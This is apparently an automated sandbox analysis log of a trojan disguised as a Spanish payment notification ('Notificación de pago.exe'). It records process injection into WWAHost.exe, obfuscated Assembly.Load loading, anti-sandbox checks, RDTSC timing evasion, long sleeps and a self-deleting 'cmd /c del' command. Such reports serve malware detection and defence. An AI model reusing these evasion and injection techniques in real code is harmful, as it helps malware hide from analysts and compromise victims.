          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039996D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039995D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039999D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039998A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039998F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039997A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039995F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999560 NtWriteFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A3C0 NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A310 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A4F0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A440 NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A3BA NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A30A NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A362 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A4EA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A4F4 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A43B NtClose,
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.314207449.0000000007930000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.308434377.0000000000C16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFormatExcept.exeF vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000000.303233250.0000000000E96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFormatExcept.exeF vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.381717233.00000000039B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000002.385915801.0000000001CFF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386824949.00000000038D6000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.306954207.0000000001830000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.308930393.00000000019D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exeBinary or memory string: OriginalFilenameFormatExcept.exeF vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Notificaci#U00f3n de pago.exeVirustotal: Detection: 21%
          Source: Notificaci#U00f3n de pago.exeReversingLabs: Detection: 41%
          Source: Notificaci#U00f3n de pago.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Notificaci#U00f3n de pago.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/3
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Notificaci#U00f3n de pago.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Notificaci#U00f3n de pago.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Notificaci#U00f3n de pago.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: WWAHost.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb8A source: Notificaci#U00f3n de pago.exe
          Source: Binary string: WWAHost.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb source: Notificaci#U00f3n de pago.exe

          Data Obfuscation

          Source: Notificaci#U00f3n de pago.exe, Rw/FJ.cs .Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs .Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs .Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.7.unpack, Rw/FJ.cs .Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.9.unpack, Rw/FJ.cs .Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.2.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs .Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.3.unpack, Rw/FJ.cs .Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs .Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.5.unpack, Rw/FJ.cs .Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.0.unpack, Rw/FJ.cs .Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.2.unpack, Rw/FJ.cs .Net Code: Qyc System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: Notificaci#U00f3n de pago.exe, Rw/FJ.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 0.2.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 0.0.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/FJ.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.7.unpack, Rw/FJ.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.9.unpack, Rw/FJ.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.2.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.3.unpack, Rw/FJ.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/FJ.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.5.unpack, Rw/FJ.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.0.unpack, Rw/FJ.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.2.unpack, Rw/FJ.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "456E756D43617465676F7279496E7374616E636573466C", "7763786A4E67544675", "PagedOptionsDialog" } }, null, null)
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe Code function: 0_2_00B98EDF push ss; retf
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe Code function: 8_2_0041A082 push 01F04D8Ch; iretd
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe Code function: 8_2_00416D1E push ds; retf
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe Code function: 8_2_00416DE0 push es; iretd
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe Code function: 8_2_0041D662 push eax; ret
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe Code function: 8_2_0041D66B push eax; ret
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe Code function: 8_2_0041D615 push eax; ret
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe Code function: 8_2_0041D6CC push eax; ret
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe Code function: 8_2_0041E773 push ecx; ret
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe Code function: 8_2_00E18EDF push ss; retf
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 14_2_039AD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 14_2_00A7A082 push 01F04D8Ch; iretd
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 14_2_00A76DE0 push es; iretd
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 14_2_00A76D1E push ds; retf
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 14_2_00A7D6CC push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 14_2_00A7D615 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 14_2_00A7D662 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 14_2_00A7D66B push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 14_2_00A7E773 push ecx; ret
          Source: initial sample Static PE information: section name: .text entropy: 7.92135270708
          Source: Notificaci#U00f3n de pago.exe, Rw/Yt.cs High entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 0.2.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/Yt.cs High entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 0.0.Notificaci#U00f3n de pago.exe.b90000.0.unpack, Rw/Yt.cs High entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.7.unpack, Rw/Yt.cs High entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.9.unpack, Rw/Yt.cs High entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.2.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.3.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.1.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.5.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.0.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'
          Source: 8.0.Notificaci#U00f3n de pago.exe.e10000.2.unpack, Rw/Yt.csHigh entropy of concatenated method names: 'az', 'Jys', 'pyd', 'hyI', '.ctor', 'pR', 'xT', 'sq', 'd3', 'G9'

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WWAHost.exe | Process created: /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Windows\SysWOW64\WWAHost.exe | Process created: /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WWAHost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match | File source: 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Notificaci#U00f3n de pago.exe PID: 6360, type: MEMORYSTR
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | RDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | RDTSC instruction interceptor: First address: 0000000000408F8E second address: 0000000000408F94 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exe | RDTSC instruction interceptor: First address: 0000000000A68C04 second address: 0000000000A68C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exe | RDTSC instruction interceptor: First address: 0000000000A68F8E second address: 0000000000A68F94 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe TID: 6364 | Thread sleep time: -45733s >= -30000s
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe TID: 6448 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WWAHost.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Code function: 8_2_00408EC0 rdtsc
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WWAHost.exe | API coverage: 9.4 %
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Thread delayed: delay time: 45733
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Thread delayed: delay time: 922337203685477
